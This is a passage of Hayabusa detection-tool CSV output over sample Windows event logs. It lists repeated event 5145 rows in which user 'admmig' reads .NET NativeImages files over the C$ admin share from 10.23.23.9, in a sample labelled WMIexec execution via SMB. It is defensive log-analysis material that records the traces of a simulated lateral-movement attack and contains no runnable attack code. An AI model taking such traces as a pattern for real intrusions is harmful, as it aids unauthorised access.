admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# : IP Address: 